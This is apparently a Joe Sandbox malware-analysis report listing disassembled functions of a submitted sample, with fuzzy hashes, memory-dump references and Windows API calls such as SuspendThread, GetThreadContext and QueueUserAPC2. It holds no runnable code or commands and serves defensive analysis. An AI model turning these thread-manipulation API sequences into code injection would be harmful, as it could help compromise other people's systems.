Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: CounterPerformanceQuery
String ID:
API String ID: 2783962273-0
Opcode ID: 5af5f63dcc86133a8a2d15b087edacc6220407739e92971b4d31ee62c5bff28e
Instruction ID: 9c988ee84d180d3d8357eaa072c14e7c931d4082716c4c324e11e378506d90cd
Opcode Fuzzy Hash: 5af5f63dcc86133a8a2d15b087edacc6220407739e92971b4d31ee62c5bff28e
Instruction Fuzzy Hash: D5029123E2AB8645EA56CB34D46037467B8BF49B58F254B35DA4D933A1FF3DE492C200

Function 00007FF67DCE8C40 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3081d85abe31c2ea19e498ffb53e1d9d8abab22bc1347291ce38af1670bf61d
Instruction ID: a355ed1de04992ce37b161090b1efbc3b6a028b1b3a5a9cbe4bfaebb9ff53c73
Opcode Fuzzy Hash: e3081d85abe31c2ea19e498ffb53e1d9d8abab22bc1347291ce38af1670bf61d
Instruction Fuzzy Hash: 44E191B3A29BC586EB558B25E94137877E5BB49B84F054B36C94E833A0EF3CE485C701

Function 00007FF67DCD8B30 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7858e46456ae85e729f2cd15505e0535f1daab729ee9194f3b71da9917305d0
Instruction ID: 6ca986af3427a6f80177fe3fdcbced5d4ee1f16304ca555cff8232c5c9712683
Opcode Fuzzy Hash: e7858e46456ae85e729f2cd15505e0535f1daab729ee9194f3b71da9917305d0
Instruction Fuzzy Hash: 3FC19073A68A8686EA00CB25ED5027877A5FF45B90F564B36C95E837D4EF3CE452C301

Function 00007FF67DD64980 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87a9e1316ae7c537e829b6c01444678f52bece2c80465a58d20448421e9007bc
Instruction ID: ddcd4de5595f5cb9c49ab8be8ec0053b50778588d25aff7e605a6b208ed8a2a8
Opcode Fuzzy Hash: 87a9e1316ae7c537e829b6c01444678f52bece2c80465a58d20448421e9007bc
Instruction Fuzzy Hash: AAB1AE33A2D65186E7658B26A50477E76E1EB80BD4F008735EA8D83B98FF3CD481CB40

Function 00007FF67DCE2500 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 769cacd4ee175a8b55fcfdd41ddef0e32f473ae537d8ec8258f818ee0db44cf0
Instruction ID: 2f19a615acab749ed4045c865b3bc66a0969f5bec99b71eb146bdab0c8c77a5d
Opcode Fuzzy Hash: 769cacd4ee175a8b55fcfdd41ddef0e32f473ae537d8ec8258f818ee0db44cf0
Instruction Fuzzy Hash: E2C19273B28B9682EA00CB25E851278B7A9FF45794B460B36C95DC7790EF3CE451C701

Function 00007FF67DCC6C40 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef581f49f2bbca10592a8ef9fae315d58ae8bcec94e63ba16ce4536efbd6aedb
Instruction ID: ede40598f147cc130f4b476f27f1e4a7e68645945823e88cb36c1feb8d3b9766
Opcode Fuzzy Hash: ef581f49f2bbca10592a8ef9fae315d58ae8bcec94e63ba16ce4536efbd6aedb
Instruction Fuzzy Hash: 11914B33A69B8286E760CB25E94076933A4FB48784F114B36DA8DC3765FF7CE0928701

Function 00007FF67DCD8FB0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4e3e56eb3348b29035f093609789f8e02d2ce81ca924eedc20fb57aa0edaad1
Instruction ID: 43f6beeec66e3c32b271607771bb46a85d49e1add87b02d053e0d6ccd5bbfb89
Opcode Fuzzy Hash: b4e3e56eb3348b29035f093609789f8e02d2ce81ca924eedc20fb57aa0edaad1
Instruction Fuzzy Hash: 5851F727FBA74E01E906877A65416B951666F5E7C0E2CCF32D90EB6790FF3DB0828600

Function 00007FF67DCD3280 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53b80ccb5ef75a1dae41b05687c21f832e2edc0d6450a3322cda06c70b66199
Instruction ID: a44f221c2dad37268e190b9744efde22fc40ae5a28114481d9c7c3390eda82b0
Opcode Fuzzy Hash: f53b80ccb5ef75a1dae41b05687c21f832e2edc0d6450a3322cda06c70b66199
Instruction Fuzzy Hash: 6161E533A78B8586D656CB34A941D68A7ADAF51780BA49731ED4FA3251FF3CB093C300

Function 00007FF67DCDF5D0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: b6ee9a698db5019510b0d6012d81891d5616e9b8cfbf37290707eb3bf70785f2
Instruction ID: a74bf4f4da393759ae3ec2490b75c43a1129bd1c71072bb66bb6b9e8e0277fa0
Opcode Fuzzy Hash: b6ee9a698db5019510b0d6012d81891d5616e9b8cfbf37290707eb3bf70785f2
Instruction Fuzzy Hash: A7210A23B7868242EBA48779AA9167D1364EB89780F552631DE0C43E9AFD1CD4938A04

Function 00007FF67DCBAC00 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00007FF67DCB608A), ref: 00007FF67DCBAC23
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF67DCB608A), ref: 00007FF67DCBAC38
GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF67DCB608A), ref: 00007FF67DCBAC45
InitializeContext.KERNEL32(?,?,?,?,?,00007FF67DCB608A), ref: 00007FF67DCBAC84
GetLastError.KERNEL32(?,?,?,?,?,00007FF67DCB608A), ref: 00007FF67DCBAC92
InitializeContext.KERNEL32(?,?,?,?,?,00007FF67DCB608A), ref: 00007FF67DCBACE6

Strings

kernel32.dll, xrefs: 00007FF67DCBAC1C
InitializeContext2, xrefs: 00007FF67DCBAC2E

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
String ID: InitializeContext2$kernel32.dll
API String ID: 4102459504-3117029998
Opcode ID: 1d0405cc6862edbe8c41d68b259fdfff7295b98a7fa69f2940811987415577ac
Instruction ID: 11f14c962c2dc24a1fa551d8a610f463955c19a37e107a18786c6092c552f852
Opcode Fuzzy Hash: 1d0405cc6862edbe8c41d68b259fdfff7295b98a7fa69f2940811987415577ac
Instruction Fuzzy Hash: 22316123A2C78682FA429B51F900239A3A4FF84791F080A35D98DC37A4FF7CE596C710

Function 00007FF67DCB5F20 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 83threadlibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00007FF67DCBAFB1
GetProcAddress.KERNEL32 ref: 00007FF67DCBAFC1
GetLastError.KERNEL32 ref: 00007FF67DCBB014
SuspendThread.KERNEL32 ref: 00007FF67DCBB02D
GetThreadContext.KERNEL32 ref: 00007FF67DCBB048
ResumeThread.KERNEL32 ref: 00007FF67DCBB072

Strings

QueueUserAPC2, xrefs: 00007FF67DCBAFBA
kernel32, xrefs: 00007FF67DCBAFA4

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
String ID: QueueUserAPC2$kernel32
API String ID: 3714266957-4022151419
Opcode ID: 2dbf54c5f01aca65eb66055d7c9b48153e42cdf8f1605713f2bb3803d5304220
Instruction ID: 797f85bc960d09dc45aace8de18f1992d1064573585873c79bf8b42438c4c1f8
Opcode Fuzzy Hash: 2dbf54c5f01aca65eb66055d7c9b48153e42cdf8f1605713f2bb3803d5304220
Instruction Fuzzy Hash: 7431B262A2CA8281FA51DB16F9503792765BF44BE4F441B30E9AEC76E4FF2CE546C700

Function 00007FF67DCCDC60 Relevance: 10.7, APIs: 7, Instructions: 227threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF67DCCDD21
SwitchToThread.KERNEL32 ref: 00007FF67DCCDDCA
SwitchToThread.KERNEL32 ref: 00007FF67DCCDDD3
SwitchToThread.KERNEL32 ref: 00007FF67DCCDF0A
SwitchToThread.KERNEL32 ref: 00007FF67DCCDF13
SwitchToThread.KERNEL32 ref: 00007FF67DCCDF3D

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 6f50f619f5677876c274c0d5cfccc22aae5b953314ac535087d293ad13c19e88
Instruction ID: 91450fec8686362c6288a328d3b29a5f6d80242ac9509b22b7260e14d12a3e11
Opcode Fuzzy Hash: 6f50f619f5677876c274c0d5cfccc22aae5b953314ac535087d293ad13c19e88
Instruction Fuzzy Hash: 3BA17B33E2C28786F7509B25AC41A7922B9AF50754F094F39EA1DC76D9FE2CF842C641

Function 00007FF67DCD24B0 Relevance: 10.6, APIs: 7, Instructions: 134threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF67DCD24BF
EnterCriticalSection.KERNEL32 ref: 00007FF67DCD24F7
LeaveCriticalSection.KERNEL32 ref: 00007FF67DCD250F
SwitchToThread.KERNEL32 ref: 00007FF67DCD25CA
SwitchToThread.KERNEL32 ref: 00007FF67DCD25D3
SwitchToThread.KERNEL32 ref: 00007FF67DCD25FD
LeaveCriticalSection.KERNEL32 ref: 00007FF67DCD26A2

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: Thread$CriticalSectionSwitch$Leave$CurrentEnter
String ID:
API String ID: 2584832284-0
Opcode ID: 026665f2e6a653b12c3c63bc81b32e7424f24d2f9ad171fed27497865999a0b0
Instruction ID: 35d26e352300a20abc70e7fff82d5158735ce852ecc8ea3bf964a4bc3b6647b1
Opcode Fuzzy Hash: 026665f2e6a653b12c3c63bc81b32e7424f24d2f9ad171fed27497865999a0b0
Instruction Fuzzy Hash: B3514B33E7C29386F610AB64AC5267962A9AF40714F114F3AE41DC32E1FE2DF4438B51

Function 00007FF67DCB6320 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF67DCB635A
GetCurrentProcess.KERNEL32 ref: 00007FF67DCB6368
GetCurrentThread.KERNEL32 ref: 00007FF67DCB6370
DuplicateHandle.KERNEL32 ref: 00007FF67DCB6394

Part of subcall function 00007FF67DCBAAB0: VirtualQuery.KERNEL32 ref: 00007FF67DCBAAE2

RaiseFailFastException.KERNEL32 ref: 00007FF67DCB63C2

Strings

, xrefs: 00007FF67DCB63D6

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
String ID:
API String ID: 510365852-3916222277
Opcode ID: c35da7c7bb1eddc8df587918431eb49580a9460cf0c58618425ee4440bcdca6f
Instruction ID: 274a9da61f3b93999495307548ddeb4b95723aa6e36de27e9513061f277e4eef
Opcode Fuzzy Hash: c35da7c7bb1eddc8df587918431eb49580a9460cf0c58618425ee4440bcdca6f
Instruction Fuzzy Hash: 34118B73A08B818AD760EF25A4411DA7360FB457B4F140339E6BE8BBD6DF39D4828B40

Function 00007FF67DCDD680 Relevance: 9.2, APIs: 6, Instructions: 189threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF67DCDD74A
SwitchToThread.KERNEL32 ref: 00007FF67DCDD753
SwitchToThread.KERNEL32 ref: 00007FF67DCDD77D
SwitchToThread.KERNEL32 ref: 00007FF67DCDD8AF
SwitchToThread.KERNEL32 ref: 00007FF67DCDD8B8
SwitchToThread.KERNEL32 ref: 00007FF67DCDD8E2

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 003e41ce845c6e76dd1595ef84ef0d82e09a65307b701c4711c633a64d6611b4
Instruction ID: fb20d35bbdb2b6fa08ad9d56abb22eff102e05fbe78615a3dbddd06d54a18a4e
Opcode Fuzzy Hash: 003e41ce845c6e76dd1595ef84ef0d82e09a65307b701c4711c633a64d6611b4
Instruction Fuzzy Hash: 88814B33F6C3838AF6549B25AC4163922A9AF40754F294B39D91CC72D9FE2DF843CA41

Function 00007FF67DCDA1D0 Relevance: 9.2, APIs: 6, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9789bc1a6d09f2778f192f378db96bc015f8b2fdc2add68277cdec284b113d04
Instruction ID: b5cb1bbe4e810ed5251f0c5a40337b8e190682115089e9f89a80027b38196761
Opcode Fuzzy Hash: 9789bc1a6d09f2778f192f378db96bc015f8b2fdc2add68277cdec284b113d04
Instruction Fuzzy Hash: F271A423A7D78281EA509B62AA0027967B9BF54B94F1C0F35DA5DC7799FF3CE4528300

Function 00007FF67DCDFB60 Relevance: 7.8, APIs: 6, Instructions: 317COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67DCDFF4A
LeaveCriticalSection.KERNEL32 ref: 00007FF67DCDFF8F
EnterCriticalSection.KERNEL32 ref: 00007FF67DCE0047
LeaveCriticalSection.KERNEL32 ref: 00007FF67DCE0068
EnterCriticalSection.KERNEL32 ref: 00007FF67DCE00AC
LeaveCriticalSection.KERNEL32 ref: 00007FF67DCE00CD

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
